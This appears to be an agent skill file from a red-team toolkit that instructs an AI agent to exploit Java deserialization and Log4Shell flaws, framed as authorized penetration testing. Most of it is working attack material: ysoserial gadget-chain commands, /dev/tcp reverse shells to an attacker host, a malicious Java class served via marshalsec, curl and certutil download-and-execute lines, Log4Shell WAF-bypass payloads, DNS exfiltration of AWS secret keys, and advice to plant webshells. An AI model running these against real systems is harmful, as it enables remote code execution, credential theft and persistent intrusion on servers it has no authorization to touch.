Exploit Java deserialization vulnerabilities during authorized penetration testing.
Install
npx skillscat add blacklanternsecurity/red-run/deserialization-java Install via the SkillsCat registry.
Java Deserialization
You are helping a penetration tester exploit Java deserialization
vulnerabilities. The target application deserializes untrusted Java objects,
enabling gadget chain attacks for remote code execution. All testing is under
explicit written authorization.
Engagement Logging
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print
[deserialization-java] Activated → <target>to the screen on activation. - Evidence → save significant output to
engagement/evidence/with
descriptive filenames (e.g.,sqli-users-dump.txt,ssrf-aws-creds.json).
Do NOT write to engagement/activity.md, engagement/findings.md, or
engagement state. The orchestrator maintains these files. Report all findings
in your return summary.
State Management
Call get_state_summary() from the state-reader MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Do NOT write engagement state. When your work is complete, report all
findings clearly in your return summary. The orchestrator parses your summary
and records state changes. Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
- A Java deserialization endpoint (HTTP parameter, cookie, RMI, JMX, T3, JMS)
- Tools:
ysoserial(java -jar ysoserial.jar), optionallymarshalsec,ysoserial-modified(for complex shell commands) - DNS callback receiver (Burp Collaborator, interactsh) for blind detection
- Proxy (Burp Suite) for intercepting and modifying serialized data
Step 1: Assess
If not already provided, determine:
- Serialization format — look for these signatures:
| Signature | Format | Where Found |
|---|---|---|
AC ED 00 05 (hex) |
Java serialized | Raw binary in request/response |
rO0AB (base64) |
Java serialized (b64) | Parameters, cookies, headers |
H4sIA (base64) |
Gzip + Java serialized | Compressed serialized data |
application/x-java-serialized-object |
Content-Type | HTTP headers |
Entry point type:
- HTTP parameters / cookies / headers (base64-encoded)
- JSF ViewState (
javax.faces.ViewStateparameter,.faces/.xhtmlURLs) - RMI (port 1099)
- T3 protocol (WebLogic, port 7001)
- JMX (management port)
- JMS message brokers (ActiveMQ, RabbitMQ)
Server technology — check response headers, error pages, default files
for WebLogic, JBoss/WildFly, Tomcat, Jenkins, Spring Boot
Skip if context was already provided.
Step 2: Blind Detection (URLDNS)
Always start with blind detection before attempting RCE. The URLDNS gadget
uses only JDK classes (no library dependencies) and triggers a DNS lookup:
# Generate URLDNS payload — triggers DNS callback, no RCE
java -jar ysoserial.jar URLDNS "http://COLLABORATOR.oastify.com" > payload.bin
# Base64 encode for HTTP parameters
java -jar ysoserial.jar URLDNS "http://COLLABORATOR.oastify.com" | base64 -w0
# Send via curl (base64 in parameter)
curl -X POST https://TARGET/endpoint \
-d "data=$(java -jar ysoserial.jar URLDNS 'http://ID.oastify.com' | base64 -w0)"If DNS callback received: deserialization confirmed. Proceed to Step 3.
If no callback: try alternative entry points, check if data is
gzip-compressed or differently encoded, or the endpoint may not deserialize.
Step 3: Identify Gadget Libraries
Determine which libraries are on the target's classpath. Use GadgetProbe
(Burp extension) for black-box detection, or enumerate from error messages,
known framework defaults, or exposed dependency files.
Common library → gadget chain mapping:
| Library | Version | Gadget Chains |
|---|---|---|
| commons-collections 3.x | 3.1-3.2.1 | CommonsCollections1,3,5,6,7 |
| commons-collections 4.x | 4.0 | CommonsCollections2,4 |
| commons-beanutils | 1.9.x | CommonsBeanutils1 |
| spring-core + spring-beans | 4.x | Spring1, Spring2 |
| groovy | 2.3.x | Groovy1 |
| hibernate | various | Hibernate1, Hibernate2 |
| rome | 1.0 | ROME |
| c3p0 | 0.9.5.x | C3P0 |
| bsh (BeanShell) | 2.0b5 | BeanShell1 |
| JDK only (pre-8u20) | <8u20 | Jdk7u21 |
Framework defaults:
- Spring Boot: commons-collections, spring-core, jackson
- WebLogic: commons-collections (older), coherence
- JBoss: commons-collections, jboss-interceptors
- Jenkins: commons-collections, groovy
If unsure, try CommonsCollections5 first (works on JDK 8u76+), then
CommonsBeanutils1, then CommonsCollections4.
Step 4: Exploit with ysoserial
Basic RCE
# CommonsCollections5 (reliable, JDK 8u76+ compatible)
java -jar ysoserial.jar CommonsCollections5 "COMMAND" | base64 -w0
# CommonsCollections4 (commons-collections4)
java -jar ysoserial.jar CommonsCollections4 "COMMAND" | base64 -w0
# CommonsBeanutils1 (when CommonsCollections chains fail)
java -jar ysoserial.jar CommonsBeanutils1 "COMMAND" | base64 -w0Runtime.exec() Limitations
Runtime.exec() cannot handle shell operators (|, >, &, ;).
Workarounds:
# Method 1: bash -c with brace encoding (avoids spaces in args)
java -jar ysoserial.jar CommonsCollections5 \
'bash -c {echo,BASE64_ENCODED_CMD}|{base64,-d}|{bash,-i}'
# Generate the base64 payload:
echo -n 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1' | base64
# Then substitute into the brace-encoded command
# Method 2: Use ysoserial-modified (handles pipes/redirects natively)
java -jar ysoserial-modified.jar CommonsCollections5 \
'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'
# Method 3: Download and execute
java -jar ysoserial.jar CommonsCollections5 \
'curl http://ATTACKER/shell.sh -o /tmp/s.sh'
# Then:
java -jar ysoserial.jar CommonsCollections5 'bash /tmp/s.sh'
# Windows: certutil download
java -jar ysoserial.jar CommonsCollections5 \
'cmd /c certutil -urlcache -split -f http://ATTACKER/payload.exe c:\temp\p.exe'Sending the Payload
# HTTP POST parameter (base64)
curl -X POST https://TARGET/endpoint \
-d "param=$(java -jar ysoserial.jar CommonsCollections5 'id' | base64 -w0)"
# HTTP cookie
curl https://TARGET/ -b \
"session=$(java -jar ysoserial.jar CommonsCollections5 'id' | base64 -w0)"
# Raw binary (Content-Type: application/x-java-serialized-object)
java -jar ysoserial.jar CommonsCollections5 'id' | \
curl -X POST https://TARGET/endpoint \
-H 'Content-Type: application/x-java-serialized-object' \
--data-binary @-Step 5: JNDI Injection
For endpoints that perform JNDI lookups with attacker-controlled input
(including Log4Shell CVE-2021-44228).
Log4Shell (CVE-2021-44228)
Affects Log4j 2.0-beta9 through 2.14.1.
Detection payloads (inject in any logged field — User-Agent, headers,
form fields, API parameters):
${jndi:ldap://COLLABORATOR.oastify.com/a}
${jndi:dns://COLLABORATOR.oastify.com/a}WAF bypass variants:
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://CALLBACK/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://CALLBACK/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//CALLBACK/a}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://CALLBACK/a}Data exfiltration via Log4Shell:
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.CALLBACK/a}
${jndi:ldap://${sys:user.name}.CALLBACK/a}
${jndi:ldap://${java:version}.CALLBACK/a}
${jndi:ldap://${env:HOSTNAME}.CALLBACK/a}JNDI RCE via marshalsec
# Terminal 1: Start LDAP referral server
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar \
marshalsec.jndi.LDAPRefServer "http://ATTACKER:8000/#Exploit"
# Terminal 2: Compile exploit class
cat > Exploit.java << 'JAVA'
public class Exploit {
static {
try {
Runtime.getRuntime().exec(
new String[]{"bash", "-c", "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"});
} catch (Exception e) { e.printStackTrace(); }
}
}
JAVA
javac Exploit.java -source 8 -target 8
# Terminal 3: Serve the class file
python3 -m http.server 8000
# Trigger: inject JNDI URL into vulnerable parameter
${jndi:ldap://ATTACKER:1389/Exploit}Note: Remote class loading blocked on JDK 8u121+ (RMI) and 6u141+/8u121+
(LDAP). For modern JDKs, use deserialization gadgets via JNDI instead:
# Generate serialized gadget
java -jar ysoserial.jar CommonsCollections5 'COMMAND' > /tmp/payload.ser
# Serve via JNDI-Injection-Exploit (handles modern JDK restrictions)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar \
-L ATTACKER:1389 -P /tmp/payload.serStep 6: JSF ViewState Deserialization
For JSF applications (.faces, .xhtml URLs) with javax.faces.ViewState.
Detection:
- Parameter
javax.faces.ViewStatein POST requests - Base64 prefix
rO0AB(raw) orH4sIA(gzip) - Framework: Oracle Mojarra or Apache MyFaces
MyFaces with default/weak encryption keys:
| Algorithm | Default Secret |
|---|---|
| AES CBC | NzY1NDMyMTA3NjU0MzIxMA== |
| DES | NzY1NDMyMTA= |
| DESede | MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz |
If ViewState is not encrypted or uses default keys, generate payload with
ysoserial and inject as javax.faces.ViewState parameter.
Step 7: Framework-Specific Attacks
WebLogic (T3 Protocol)
# Detect T3 protocol (port 7001)
nmap -p 7001 --script weblogic-t3-info TARGET
# Exploit via T3 with ysoserial payload
# Use CVE-2015-4852 or later T3 deserialization CVEs
python3 weblogic_t3_exploit.py -t TARGET -p 7001 \
-y ysoserial.jar -g CommonsCollections1 -c "id"JBoss
# Check for exposed invoker servlets
curl -v http://TARGET/invoker/JMXInvokerServlet
curl -v http://TARGET/invoker/EJBInvokerServlet
# If accessible, send ysoserial payload directly
java -jar ysoserial.jar CommonsCollections5 'id' | \
curl -X POST http://TARGET/invoker/JMXInvokerServlet \
-H 'Content-Type: application/x-java-serialized-object' \
--data-binary @-
# Automated: JexBoss
python3 jexboss.py -u http://TARGET:8080Jenkins
# Jenkins CLI protocol uses serialized objects
# Check for /cli endpoint
curl http://TARGET/cli
# Exploit pre-2.x Jenkins with commons-collections
java -jar ysoserial.jar CommonsCollections1 'id' | \
curl -X POST http://TARGET/cli \
-H 'Content-Type: application/x-java-serialized-object' \
--data-binary @-Step 8: Escalate or Pivot
Reverse Shell via MCP
When RCE is confirmed, prefer catching a reverse shell via the MCP
shell-server over continuing to send serialized payloads for each command.
- Call
start_listener(port=<port>)to prepare a catcher on the attackbox - Send a reverse shell payload via the deserialization vector:
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1 - Call
stabilize_shell(session_id=...)to upgrade to interactive PTY - Use
send_command()for all subsequent commands
If the target lacks outbound connectivity, continue with inline command
execution and note the limitation in the engagement state.
- Got RCE + shell stabilized: STOP. Return to orchestrator recommending
linux-discovery or windows-discovery (based on target OS). Pass:
hostname, current user, shell session ID, and access method. - Blind execution only (DNS/sleep): Exfiltrate data via DNS
($(whoami).CALLBACK), or write webshell to web root - Found credentials in config: Route to sql-injection-stacked for
database access or AD credential reuse - SSRF via JNDI: Route to ssrf for internal network exploitation
- Log4Shell in multiple services: Enumerate all services logging
attacker-controlled input, exploit each - Need to crack hashes found: Route to hash cracking
Update engagement/state.md with any new credentials, access, vulns, or pivot paths discovered.
When routing, pass along: confirmed gadget chain, target framework/version,
and any payloads that already succeeded.
Stall Detection
If you have spent 5 or more tool-calling rounds on the same failure with
no meaningful progress — same error, no new information, no change in output
— stop.
What counts as progress:
- Trying a variant or alternative documented in this skill
- Adjusting syntax, flags, or parameters per the Troubleshooting section
- Gaining new diagnostic information (different error, partial success)
What does NOT count as progress:
- Writing custom exploit code not provided in this skill
- Inventing workarounds using techniques from other domains
- Retrying the same command with trivially different input
- Compiling or transferring tools not mentioned in this skill
If you find yourself writing code that isn't in this skill, you have left
methodology. That is a stall.
Do not loop. Work through failures systematically:
- Try each variant or alternative once
- Check the Troubleshooting section for known fixes
- If nothing works after 5 rounds, you are stalled
When stalled, return to the orchestrator immediately with:
- What was attempted (commands, variants, alternatives tried)
- What failed and why (error messages, empty responses, timeouts)
- Assessment: blocked (permanent — config, patched, missing prereq) or
retry-later (may work with different context, creds, or access)
When stalled: Tell the user you're stalled, present what was tried, and
recommend the next best path. Return findings to the orchestrator — it will
decide whether to revisit with new context or route elsewhere.
OPSEC Notes
- URLDNS payloads generate DNS traffic — visible to network monitoring
- ysoserial payloads may trigger IDS/WAF signatures (commons-collections
class names in serialized data) - Log4Shell payloads logged extensively — assume blue team visibility
- JNDI exploitation requires attacker-controlled LDAP/RMI server — outbound
connection from target is visible - JBoss/WebLogic invoker servlets are commonly monitored endpoints
Troubleshooting
Gadget Chain Throws Exception
- Try different chains: CommonsCollections5 → CommonsBeanutils1 →
CommonsCollections4 → ROME → Groovy1 - Check JDK version: Jdk7u21 only works pre-8u20
- The target may have patched commons-collections — try chains using
other libraries
Runtime.exec() Command Fails Silently
Runtime.exec()does not support shell operators- Use bash brace encoding or ysoserial-modified
- Test with simple command first (
touch /tmp/proof,ping ATTACKER) - On Windows, prefix with
cmd /c
JNDI Lookup Blocked (Modern JDK)
- JDK 8u121+ blocks remote class loading via RMI/LDAP
- Use deserialization gadgets served via JNDI instead of remote classes
- Use JNDI-Injection-Exploit or marshalsec with serialized payloads
No DNS Callback from URLDNS
- Verify the parameter actually reaches
ObjectInputStream.readObject() - Check if data needs to be gzip-compressed before base64
- Try sending raw binary instead of base64
- Endpoint may use a custom
ObjectInputStreamwith class filtering